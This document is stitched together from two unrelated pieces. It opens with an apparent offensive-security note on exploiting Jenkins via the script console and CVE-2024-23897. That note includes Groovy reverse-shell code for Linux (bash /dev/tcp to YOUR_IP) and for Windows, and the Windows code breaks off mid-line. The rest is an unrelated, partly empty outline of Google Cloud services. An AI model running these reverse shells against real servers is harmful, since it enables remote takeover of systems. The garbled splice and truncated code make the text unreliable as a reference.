Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Compute:
1) Compute Engine VM
Compute Engine is Google’s VM service. Users can choose CPUs, memory, persistent disks, and operating systems.
2) Kubernetes
Kubernetes Engine manages groups of virtual servers and applications that run in containers.
Kubernetes is called an orchestration service because it distributes containers across clusters, monitors cluster health, and scales as proscribed by configurations.
3) App Engine
App Engine is Google’s PaaS. Developers can run their code in a language-specific sandbox when using the standard environment or in a container when using the flexible environment.
App Engine is a server-less service, so customers do not need to specify VM configurations or manage servers.
The App Engine standard environment runs applications in language-specific sandboxes and is not a general container management system.
App Engine flexible environments allow you to run containers on the App Engine PaaS.
4) Cloud Functions
Cloud Functions is a server-less service that is designed to execute short-running code that responds to events, such as file uploads or messages being published to a message queue.
Functions may be written in Node.js or Python.
Storage:
1) Cloud Storage
Object stores are used to store and access file-based resources. These objects are referenced by a unique identifier, such as a URL. Object stores do not provide block or file system services, so they are not suitable for database storage. Cloud Storage is GCP’s object storage service.
2) Persistent Disk
3) Cloud Filestore
File storage supports block-based access to files. Files are organized into directories and subdirectories. Google’s Filestore is based on the NFS.
4) Cloud SQL
5) Cloud Bigtable
Google's offering for Wide-column databases
6) Cloud Spanner
Cloud Spanner is a global relational database that provides the advantages of relational databases with the scalability previously found only in NoSQL databases.
7) Cloud Datastore
NoSQL database for document databases
8) Cloud Memorystore
Cache and is a key-value stores
9) Cloud Firestore
Networking:
1) Virtual Private Cloud
A VPC is a logical isolation of an organization’s cloud resources within a public cloud. In GCP, VPCs are global; they are not restricted to a single zone or region. All traffic between GCP services can be transmitted over the Google network without the need to send traffic over the public Internet.
2) Cloud Load Balancing
Load balancing is the process of distributing a workload across a group of servers. Load balancers can route workload based on network-level or application-level rules. GCP load balancers can distribute workloads globally.
3) Cloud Armor
4) Cloud CDN
5) Cloud Interconnect
a) Interconnects
b) Peering
6) Cloud DNS
7) Identity Management
8) Development Tools
Management Tools:
1) Stackdriver
2) Monitoring
3) Logging
4) Error Reporting
5) Trace
6) Debugger
7) Profiler
Specialized Services:
1) Apigee API Platform
2) Data Analytics
a) BigQuery
b) Cloud Dataproc
c) Cloud Dataflow
d) Cloud Dataprep
3) AI and Machine Learning
a) Cloud AutoML
b) Cloud Machine Learning Enginer
c) Cloud Natural Language Processing
d) Cloud Vision
[This article is continuously updated over time]